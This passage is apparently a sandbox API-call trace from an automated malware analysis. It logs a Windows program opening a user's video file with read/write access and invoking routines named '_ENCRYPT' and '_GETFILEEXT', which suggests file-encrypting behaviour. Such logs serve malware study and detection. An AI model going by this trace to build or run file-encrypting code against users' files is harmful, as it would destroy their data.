(HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0196.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0196.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0196.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0196.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0196.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0196.140] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0196.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd438 [0196.140] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0196.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0196.144] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0196.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0196.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0196.144] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0196.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0196.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0196.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0196.149] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0196.149] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0196.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0196.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0196.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0196.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0196.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0196.152] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0196.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0196.152] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1890 [0196.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0196.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0196.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0196.160] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0196.161] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0196.161] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0196.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0196.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0196.163] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0196.163] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0196.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0196.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0196.164] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0196.164] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0196.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0196.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0196.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda98 [0196.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0196.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0196.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0196.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0196.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0196.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0196.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd798 [0196.167] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0196.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0196.167] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0196.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0196.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0196.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0196.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0196.170] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0196.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0196.170] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0196.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0196.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0196.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0196.171] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0196.171] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0196.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c88 [0196.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0196.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0196.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0196.173] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0196.173] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0196.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0196.189] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0196.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0196.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0196.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0196.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0196.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0196.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0196.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0196.189] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0196.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0196.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0196.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0196.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0196.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0196.189] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0196.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0196.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0196.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0196.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0196.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0196.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0196.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0196.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0196.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0196.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0196.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0196.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0196.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1990 | out: hHeap=0x8a0000) returned 1 [0196.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1990 [0196.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0196.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0196.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0196.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0196.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0196.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0196.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0196.190] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0196.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0196.190] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0196.191] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0196.191] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0196.191] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0196.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0196.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0196.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0196.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0196.191] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0196.191] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0196.191] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0196.191] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0196.191] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0196.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0196.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0196.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0196.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0196.191] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0196.191] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0196.191] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0196.191] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0196.191] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0196.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0196.191] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0196.192] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0196.196] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0196.196] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ac0 [0196.196] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0196.196] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9ba390 [0196.199] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9ba390, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0196.199] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\RIN_E.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\fokjzmjbm6_f0eozyzo\\4_l5nhx538ki1\\rin_e.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0196.206] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0196.206] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0196.206] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0196.206] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0196.206] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0196.206] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0196.206] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0196.209] FreeLibrary (hLibModule=0x75990000) returned 1 [0196.209] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0196.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0196.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0196.209] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0196.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8a8 [0196.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0196.209] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0196.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0196.210] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0196.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0196.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0196.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0196.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0196.210] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0196.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0196.210] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0196.216] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0196.216] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9c70 [0196.216] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9b9c70, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0196.217] FreeLibrary (hLibModule=0x75990000) returned 1 [0196.217] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0196.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0196.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1970 [0196.217] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0196.219] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0196.219] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0196.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1930 [0196.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de650 [0196.219] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0196.219] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0196.219] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0196.220] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0196.220] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0196.220] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0196.220] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="i", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0196.223] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="vi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0196.223] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="avi", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0196.223] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".avi", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0196.223] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0196.223] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0196.223] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0196.223] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\RIN_E.avi", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50390e50, ftCreationTime.dwHighDateTime=0x1d5e42f, ftLastAccessTime.dwLowDateTime=0xd54794f0, ftLastAccessTime.dwHighDateTime=0x1d5deb6, ftLastWriteTime.dwLowDateTime=0xd54794f0, ftLastWriteTime.dwHighDateTime=0x1d5deb6, nFileSizeHigh=0x0, nFileSizeLow=0x5016, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="RIN_E.avi", cAlternateFileName="")) returned 0x90add8 [0196.228] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0196.641] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 1 [0196.641] TranslateMessage (lpMsg=0x87f5c4) returned 0 [0196.642] DispatchMessageW (lpMsg=0x87f5c4) returned 0x0 [0196.642] Shell_NotifyIconW (dwMessage=0x1, lpData=0x87ec60) returned 1 [0196.645] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0196.645] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0196.645] KillTimer (hWnd=0x1014c, uIDEvent=0x1) returned 1 [0196.646] SetTimer (hWnd=0x1014c, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0196.646] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0196.646] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\RIN_E.avi", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50390e50, ftCreationTime.dwHighDateTime=0x1d5e42f, ftLastAccessTime.dwLowDateTime=0xd54794f0, ftLastAccessTime.dwHighDateTime=0x1d5deb6, ftLastWriteTime.dwLowDateTime=0xd54794f0, ftLastWriteTime.dwHighDateTime=0x1d5deb6, nFileSizeHigh=0x0, nFileSizeLow=0x5016, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="RIN_E.avi", cAlternateFileName="")) returned 0x90add8 [0196.655] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0196.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0196.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0196.656] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0196.656] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0196.656] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\RIN_E.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0196.656] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\RIN_E.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0196.656] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=":\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\RIN_E.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0196.656] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\RIN_E.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 1 [0196.656] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\RIN_E.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 3 [0196.656] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sers\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\4_L5NHX538Ki1\\RIN_E.avi\"", cchCount1=10, lpString2="flyingship", cchCount2=10) returned 